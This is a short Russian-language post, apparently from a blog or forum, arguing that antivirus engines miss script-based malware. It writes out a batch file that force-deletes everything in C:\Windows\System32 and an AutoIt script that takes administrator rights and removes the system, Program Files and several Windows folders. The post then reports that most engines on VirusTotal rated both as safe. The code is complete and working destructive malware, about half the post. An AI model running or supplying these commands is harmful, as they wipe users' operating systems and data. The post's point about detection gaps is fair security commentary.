Даже программы с валидными цифровыми подписями могут содержать вирусы⁠⁠

Еще раз по поводу недетектируемости вирусов на скриптовых языках антивирусами:
Я написал простой BAT-вирус для удаления всех жизненно важных системных файлов Windows и отправил его на VirusTotal:

@echo off
del C:\Windows\System32\*.* /s /f /q

Опять же все авторитетные антивирусы (включая Касперского, Dr. Web, Avast, ESET NOD32, Яндекс, Symantec, Malwarebytes, McAfee и даже Microsoft) считают данный батник безопасным, несмотря на то, что он наносит серьезный вред компьютеру.
Ссылка на отчет: https://www.virustotal.com/gui/file/5b28b62a23c35aef65f73f7c...

Я написал на AutoIt v3.3.14.5 следующий код вируса для удаления системных файлов и папок (не пытайтесь его запустить на своих компьютерах!):

#pragma compile(ExecLevel, requireAdministrator)

DirRemove(@SystemDir, 1)
DirRemove(@ProgramFilesDir, 1)
DirRemove(@WindowsDir & "\Web", 1)
DirRemove(@WindowsDir & "\Cursors", 1)
DirRemove(@WindowsDir & "\Media", 1)
DirRemove(@WindowsDir & "\Resources", 1)
DirRemove(@WindowsDir & "\Fonts", 1)
DirRemove(@WindowsDir & "\Help", 1)

Затем я скомпилировал данный скрипт с помощью прилагаемого компилятора скриптов Aut2Exe и отправил скомпилированный вредоносный скрипт на VirusTotal.

Результат: почти все авторитетные антивирусы (включая Касперского, Dr. Web, Avast, ESET NOD32, Яндекс, Symantec, Malwarebytes и McAfee, но за исключением Microsoft) считают данный файл безопасным.

Ссылка на отчет: https://www.virustotal.com/gui/file/09de6de7465115bc45854bef...